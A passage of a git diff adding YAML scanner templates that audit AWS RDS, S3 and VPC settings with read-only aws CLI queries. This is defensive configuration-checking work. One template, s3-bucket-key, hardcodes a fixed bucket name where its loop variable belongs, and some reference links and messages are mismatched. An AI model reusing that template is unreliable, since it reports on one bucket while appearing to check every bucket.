+ - type: dsl
+ dsl:
+ - 'db + " RDS instance is setup within a public subnet"'
+# digest: 4b0a00483046022100d05dd8cfd16004c66141210fee94b5b5b1bdca54b4320091e86f7b7d018c336e022100fcf57d954bb32ef2d5eaf09ca000c729ef9d372ef651d5066f8d1a1e6aee8746:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-ri-payment-fail.yaml b/cloud/aws/rds/rds-ri-payment-fail.yaml
new file mode 100644
index 0000000000..40c1bf2e1a
--- /dev/null
+++ b/cloud/aws/rds/rds-ri-payment-fail.yaml
@@ -0,0 +1,56 @@
+id: rds-ri-payment-fail
+info:
+ name: RDS RI Payment Failure
+ author: princechaddha
+ severity: high
+ description: |
+ Identifies failed RDS Reserved Instance purchases due to payment failures, affecting potential cost savings.
+ impact: |
+ Prevents utilization of reserved instance discounts, potentially leading to higher operational costs.
+ remediation: |
+ Review the payment methods on file and retry the reservation purchase for RDS instances to secure discounted rates.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithReservedDBInstances.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let DBInstances of iterate(template.instances)){
+ set("db", DBInstances)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-reserved-db-instances --region $region --output json --query 'ReservedDBInstances[*].ReservedDBInstanceId'
+
+ extractors:
+ - type: json
+ name: snapshots
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-reserved-db-instances --region $region --reserved-db-instance-id $db --query 'ReservedDBInstances[*].State'
+
+ matchers:
+ - type: word
+ words:
+ - 'payment-failed'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"RDS Reserved Instance purchase has failed for " + db'
+# digest: 4a0a00473045022040705df585fbeec117d8605a7eb385b6fb0ae5cca87f948b79aef51f4a4b5b19022100a62f52ca4c10ab087a8d672d8288e120540531595b354c0663a7b5c7426ee198:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-snapshot-encryption.yaml b/cloud/aws/rds/rds-snapshot-encryption.yaml
new file mode 100644
index 0000000000..49f17f0de3
--- /dev/null
+++ b/cloud/aws/rds/rds-snapshot-encryption.yaml
@@ -0,0 +1,56 @@
+id: rds-snapshot-encryption
+info:
+ name: RDS Snapshot Encryption
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure Amazon RDS database snapshots are encrypted for data-at-rest compliance within AWS environments.
+ impact: |
+ Unencrypted RDS snapshots can expose sensitive data to unauthorized access, risking data breach and non-compliance penalties.
+ remediation: |
+ Enable encryption for RDS snapshots by using AWS KMS Customer Master Keys (CMKs) for enhanced data security and compliance.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_EncryptSnapshot.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let RDPsnaps of iterate(template.snapshots)){
+ set("snapshot", RDPsnaps)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-snapshots --region $region --snapshot-type manual --output json --query 'DBSnapshots[*].DBSnapshotIdentifier'
+
+ extractors:
+ - type: json
+ name: snapshots
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-snapshots --region $region --db-snapshot-identifier $snapshot --query 'DBSnapshots[*].Encrypted'
+
+ matchers:
+ - type: word
+ words:
+ - 'false'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Amazon RDS database snapshot " + snapshot + " is not encrypted"'
+# digest: 490a0046304402207212f314b007f635435474f0ab2253e018047b2f878450e253223d5daa74da3f022064293bf9b3a736189797d2b46e1ad224dd05fa73dfe1ff2d0531a229ab2c89c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-access-logging.yaml b/cloud/aws/s3/s3-access-logging.yaml
new file mode 100644
index 0000000000..4d86b97f8f
--- /dev/null
+++ b/cloud/aws/s3/s3-access-logging.yaml
@@ -0,0 +1,49 @@
+id: s3-access-logging
+info:
+ name: S3 Bucket - Access Logging Not Enabled
+ author: princechaddha
+ severity: medium
+ description: |
+ This template verifies if the Server Access Logging feature is enabled for Amazon S3 buckets, which is essential for tracking access requests for security and audit purposes.
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-logging --bucket $bucket --query 'LoggingEnabled'
+
+ matchers:
+ - type: word
+ words:
+ - "null"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The S3 bucket " + bucket +" does not have access logging enabled."'
+# digest: 4b0a004830460221009c7c7b0d5efd419b91df9f3a9c18cbb5c3cf3e05586c1a2feaf8e1c1c1b5d5b5022100ac7392ba990a22432ad62945a93d61578dd95013697d6c3aefd30fa5e9decaac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-auth-fullcontrol.yaml b/cloud/aws/s3/s3-auth-fullcontrol.yaml
new file mode 100644
index 0000000000..c9a52a4e69
--- /dev/null
+++ b/cloud/aws/s3/s3-auth-fullcontrol.yaml
@@ -0,0 +1,49 @@
+id: s3-auth-fullcontrol
+info:
+ name: Restrict S3 Buckets FULL_CONTROL Access for Authenticated Users
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks if Amazon S3 buckets grant FULL_CONTROL access to authenticated users, preventing unauthorized operations
+ reference:
+ - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AuthenticatedUsers`)]'
+
+ matchers:
+ - type: word
+ words:
+ - '"Permission": "FULL_CONTROL"'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"FULL_CONTROL is enabled for Authenticated Users on S3 Bucket " + bucket'
+# digest: 4b0a00483046022100ae50a09843b165ba2fcd9f5fb5774c60c2ba2ca3ec8461b893c6eb47cce50cf8022100ab31d7ca772ca4fdce476fb02441aaae4130fe68605b346dd30bcaa9f2fb0c3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-bucket-key.yaml b/cloud/aws/s3/s3-bucket-key.yaml
new file mode 100644
index 0000000000..aa49b7d2d1
--- /dev/null
+++ b/cloud/aws/s3/s3-bucket-key.yaml
@@ -0,0 +1,49 @@
+id: s3-bucket-key
+info:
+ name: S3 Bucket Key not enabled
+ author: princechaddha
+ severity: medium
+ description: |
+ This template verifies if Amazon S3 buckets have bucket keys enabled to optimize the cost of AWS Key Management Service (SSE-KMS) for server-side encryption
+ reference:
+ - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-encryption --bucket cc-prod-log-bucket --query 'ServerSideEncryptionConfiguration.Rules[?ApplyServerSideEncryptionByDefault.SSEAlgorithm==`aws:kms`].BucketKeyEnabled'
+
+ matchers:
+ - type: word
+ words:
+ - false
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Key is not enabled for S3 Bucket " + bucket'
+# digest: 490a0046304402207628f02f223a9c45013004373f631bfe358fe0898a91b4558b461cdbcb0cb33f02204c02ff4be552778912c6b81a4d7f06b0436bf0facd4066dd1b7b6a60c7fe8727:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-bucket-policy-public-access.yaml b/cloud/aws/s3/s3-bucket-policy-public-access.yaml
new file mode 100644
index 0000000000..2d1b41dd32
--- /dev/null
+++ b/cloud/aws/s3/s3-bucket-policy-public-access.yaml
@@ -0,0 +1,57 @@
+id: s3-bucket-policy-public-access
+info:
+ name: Public Access of S3 Buckets via Policy
+ author: princechaddha
+ severity: critical
+ description: |
+ This template checks if Amazon S3 buckets are configured to prevent public access via bucket policies
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-policy.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-policy --bucket $bucket --query Policy --output text
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"Effect":"Allow"'
+
+ - type: word
+ part: body
+ words:
+ - '"Principal":"*"'
+ - '"AWS":"*"'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The S3 bucket " + bucket +" is publicly accessible via Policy"'
+# digest: 4b0a004830460221009b48d546c9c75d61879e6371e646807f994d64408c3f84d48c9a9b344b9743410221009ed66db2acf2d13fb22b03344e70b7679191e4d76de5615fb69753c02d49306d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-mfa-delete-check.yaml b/cloud/aws/s3/s3-mfa-delete-check.yaml
new file mode 100644
index 0000000000..13ccba19cd
--- /dev/null
+++ b/cloud/aws/s3/s3-mfa-delete-check.yaml
@@ -0,0 +1,49 @@
+id: s3-mfa-delete-check
+info:
+ name: S3 Bucket MFA Delete Configuration Check
+ author: princechaddha
+ severity: low
+ description: |
+ This template verifies that Amazon S3 buckets are configured with Multi-Factor Authentication (MFA) Delete feature, ensuring enhanced protection against unauthorized deletion of versioned objects
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-versioning.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-versioning --bucket $bucket --query 'MFADelete'
+
+ matchers:
+ - type: word
+ words:
+ - "null"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The S3 bucket " + bucket +" is not configured to use MFA Delete feature"'
+# digest: 4a0a0047304502207b18bcd326a382b691f9645ba66223e79733146fbaaa7632197a652cb7319085022100d690b22a500eb8036ca670d596ead85d56ce5e576f1147e5e73430a5d49c3765:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-public-read-acp.yaml b/cloud/aws/s3/s3-public-read-acp.yaml
new file mode 100644
index 0000000000..a365761525
--- /dev/null
+++ b/cloud/aws/s3/s3-public-read-acp.yaml
@@ -0,0 +1,50 @@
+id: s3-public-read-acp
+
+info:
+ name: S3 Bucket with Public READ_ACP Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Verifies that Amazon S3 buckets do not permit public 'READ_ACP' (LIST) access to anonymous users, protecting against unauthorized data exposure
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`)]'
+
+ matchers:
+ - type: word
+ words:
+ - '"Permission": "READ_ACP"'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The S3 bucket " + bucket +" have public READ_ACP access"'
+# digest: 4b0a00483046022100ed3c7c8177b632e1968b920b9eef94ffdc0784d3b4cfef7073e31fa45879d929022100a4515cf3df6e19fdcc7f9c9460074d6310983bbdd4687e83cce86c290cb62c18:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-public-read.yaml b/cloud/aws/s3/s3-public-read.yaml
new file mode 100644
index 0000000000..56877aa63a
--- /dev/null
+++ b/cloud/aws/s3/s3-public-read.yaml
@@ -0,0 +1,50 @@
+id: s3-public-read
+
+info:
+ name: S3 Bucket with Public READ Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Verifies that Amazon S3 buckets do not permit public 'READ' (LIST) access to anonymous users, protecting against unauthorized data exposure
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`)]'
+
+ matchers:
+ - type: word
+ words:
+ - '"Permission": "READ"'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The S3 bucket " + bucket +" have public READ access"'
+# digest: 4a0a0047304502210096282cee509cda8603576b6bf36e9726a85cd0e5c7ffbf1a1b521840e04b9a0f022003295ca19e84cf783276bd6c7a2fa978a92543199f6da355ddfb130e465442da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-public-write-acp.yaml b/cloud/aws/s3/s3-public-write-acp.yaml
new file mode 100644
index 0000000000..aff44da984
--- /dev/null
+++ b/cloud/aws/s3/s3-public-write-acp.yaml
@@ -0,0 +1,49 @@
+id: s3-public-write-acp
+info:
+ name: S3 Bucket with Public WRITE_ACP Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions.
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`)]'
+
+ matchers:
+ - type: word
+ words:
+ - '"Permission": "WRITE_ACP"'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The S3 bucket " + bucket +" have public WRITE_ACP access"'
+# digest: 490a004630440220164c9d55d2b50ac44caa26edd47e799e3ec62871676e74736d108a8541f0c2440220136ef5897894c74ad7fb3f936e269b6a777cc4e8f520c42142558990bea8eba9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-public-write.yaml b/cloud/aws/s3/s3-public-write.yaml
new file mode 100644
index 0000000000..d2192c8cc1
--- /dev/null
+++ b/cloud/aws/s3/s3-public-write.yaml
@@ -0,0 +1,49 @@
+id: s3-public-write
+info:
+ name: S3 Bucket with Public WRITE Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks if Amazon S3 buckets are secured against public WRITE access, preventing unauthorized modifications to access control permissions.
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`)]'
+
+ matchers:
+ - type: word
+ words:
+ - '"Permission": "WRITE"'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The S3 bucket " + bucket +" have public WRITE access"'
+# digest: 490a004630440220795c3882ab9cb8a093b5e2e83c7822aaf15bfe4cff0426f3a6e5743196aa67730220375072f3c8dff6626dd361a31d12615188c7e8bd445e92f41fe755c323cefc22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-server-side-encryption.yaml b/cloud/aws/s3/s3-server-side-encryption.yaml
new file mode 100644
index 0000000000..448ee59987
--- /dev/null
+++ b/cloud/aws/s3/s3-server-side-encryption.yaml
@@ -0,0 +1,49 @@
+id: s3-server-side-encryption
+info:
+ name: Server-Side Encryption on Amazon S3 Buckets
+ author: princechaddha
+ severity: high
+ description: |
+ This template verifies if Amazon S3 buckets have server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS).
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-encryption --bucket $bucket
+
+ matchers:
+ - type: word
+ words:
+ - "ServerSideEncryptionConfigurationNotFoundError"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The S3 bucket " + bucket +" is not encrypted at rest"'
+# digest: 490a0046304402203e012cd857cace30b445932f893b9bd0f7bc709eec9f6cb5689fd30a520525e0022029cde524c58042593e654d36bfd7dcfb81b9508c534ec7750afe9ff96ad921d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/s3/s3-versioning.yaml b/cloud/aws/s3/s3-versioning.yaml
new file mode 100644
index 0000000000..30531fed21
--- /dev/null
+++ b/cloud/aws/s3/s3-versioning.yaml
@@ -0,0 +1,50 @@
+id: s3-versioning
+info:
+ name: S3 Bucket Versioning not Enabled
+ author: princechaddha
+ severity: low
+ description: |
+ Verifies that Amazon S3 buckets have object versioning enabled, providing a safeguard for recovering overwritten or deleted objects
+ reference:
+ - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let bucketName of iterate(template.buckets)){
+ set("bucket", bucketName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api list-buckets --query 'Buckets[*].Name'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: buckets
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-versioning --bucket $bucket --query 'Status'
+
+ matchers:
+ - type: word
+ words:
+ - "null"
+ - "Suspended"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Versioning is not enabled for S3 Bucket " + bucket'
+# digest: 4b0a00483046022100ceb8b6be9871b6b9b57c5aa9add8902c3177845310afee02c6f8acc0cec48331022100fc98d53a049eaf0f8450f979233fffec17fd5c23d4c90fb78e68d8f05869f7d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml
new file mode 100644
index 0000000000..1e8bf93789
--- /dev/null
+++ b/cloud/aws/vpc/nacl-open-inbound.yaml
@@ -0,0 +1,63 @@
+id: nacl-open-inbound
+info:
+ name: Open Inbound NACL Traffic
+ author: princechaddha
+ severity: medium
+ description: |
+ Checks for Amazon VPC Network ACLs with inbound rules allowing traffic from all IPs across all ports, increasing the risk of unauthorized access.
+ impact: |
+ Allows unrestricted access to resources within the subnet, potentially exposing sensitive data or services to unauthorized users.
+ remediation: |
+ Restrict Network ACL inbound rules to only allow necessary IP ranges and ports as per the Principle of Least Privilege.
+ reference:
+ - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html
+ tags: cloud,devops,aws,amazon,vpc,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let NACLIDs of iterate(template.nacls)){
+ set("naclid", NACLIDs)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-network-acls --region $region --query 'NetworkAcls[*].NetworkAclId' --output json
+
+ extractors:
+ - type: json
+ name: nacls
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-network-acls --region $region --network-acl-ids $naclid --query 'NetworkAcls[*].Entries[?(RuleAction==`allow`) && (Egress==`false`)] | []'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "allow"
+ condition: and
+
+ - type: word
+ words:
+ - "PortRange"
+ negative: true
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
+# digest: 4a0a0047304502200de3239f933f1b468292a1ac4504bc398cad18ac3aa6f2de12357bd0e8a65759022100ee901336ec076eb9058f105f779e66be7bac556e1751713419df333cca4eaddf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml
new file mode 100644
index 0000000000..b7483da1ef
--- /dev/null
+++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml
@@ -0,0 +1,63 @@
+id: nacl-outbound-restrict
+info:
+ name: Unrestricted NACL Outbound Traffic
+ author: princechaddha
+ severity: medium
+ description: |
+ Checks for Amazon VPC NACLs allowing outbound traffic to all ports, recommending restriction to necessary ports only.
+ impact: |
+ Potential for data exfiltration or unauthorized access if outbound traffic is not properly restricted.
+ remediation: |
+ Modify NACL outbound rules to limit traffic to only the ports required for legitimate business needs.
+ reference:
+ - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html
+ tags: cloud,devops,aws,amazon,vpc,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let NACLIDs of iterate(template.nacls)){
+ set("naclid", NACLIDs)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-network-acls --region $region --query 'NetworkAcls[*].NetworkAclId' --output json
+
+ extractors:
+ - type: json
+ name: nacls
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-network-acls --region $region --network-acl-ids $naclid --query 'NetworkAcls[*].Entries[?(RuleAction==`allow`) && (Egress==`true`)] | []'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "allow"
+ condition: and
+
+ - type: word
+ words:
+ - "PortRange"
+ negative: true
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
+# digest: 4a0a00473045022021e25dd23124572a8f6dbe6381024f3ecb8f78907d7ba0aafa2eb9c63990e140022100ba7669b283e58bf5b0fd08f3d5501d54221fc7a48b73b088c95330ea4c633f67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml
new file mode 100644
index 0000000000..308cb0ab0d
--- /dev/null
+++ b/cloud/aws/vpc/nat-gateway-usage.yaml
@@ -0,0 +1,56 @@
+id: nat-gateway-use
+info:
+ name: Managed NAT Gateway Usage
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure the use of Amazon Managed NAT Gateway for better availability and bandwidth in VPC networks instead of self-managed NAT instances.
+ impact: |
+ Using self-managed NAT instances can lead to single points of failure and potential bandwidth bottlenecks.
+ remediation: |
+ Replace NAT instances with Amazon Managed NAT Gateway to ensure high availability and scalability in your VPC network.
+ reference:
+ - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-nat-gateway.html
+ tags: cloud,devops,aws,amazon,vpc,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let VPCIds of iterate(template.vpcid)){
+ set("vpc", VPCIds)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-vpcs --region $region --query 'Vpcs[*].VpcId' --output json
+
+ extractors:
+ - type: json
+ name: vpcid
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-nat-gateways --region $region --filter "Name=vpc-id,Values=$vpc" "Name=state,Values=available" --query 'NatGateways'
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - 'vpc + " VPC is not using Managed NAT Gateways"'
+# digest: 4b0a00483046022100f5f55c1da4e2aaca4b9547bf032c91c95a45a559e294e66e3a04343878e6416c022100919f04f7539cccd971883f2ac51a5a40f17c588dc2bb561902f5397715facf2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml
new file mode 100644
index 0000000000..11da6b63b4
--- /dev/null
+++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml
@@ -0,0 +1,65 @@
+id: unrestricted-admin-ports
+info:
+ name: Unrestricted Admin Port Access
+ author: princechaddha
+ severity: high
+ description: |
+ Checks for unrestricted ingress on TCP ports 22 (SSH) and 3389 (RDP) in Amazon VPC NACLs, exposing remote server administration to potentially malicious traffic.
+ impact: |
+ Allows unrestricted remote access, increasing the risk of unauthorized access and potential compromise.
+ remediation: |
+ Restrict access to ports 22 and 3389 to trusted IPs or IP ranges to adhere to the Principle of Least Privilege (POLP).
+ reference:
+ - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html
+ tags: cloud,devops,aws,amazon,vpc,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let NACLIDs of iterate(template.nacls)){
+ set("naclid", NACLIDs)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-network-acls --region $region --query 'NetworkAcls[*].NetworkAclId' --output json
+
+ extractors:
+ - type: json
+ name: nacls
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-network-acls --region $region --network-acl-ids $naclid --query 'NetworkAcls[*].Entries[?(RuleAction==`allow`) && (Egress==`false`)] | []' --output json
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "0.0.0.0/0"
+ - "CidrBlock"
+ condition: and
+
+ - type: word
+ words:
+ - "22"
+ - "3389"
+ condition: or
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
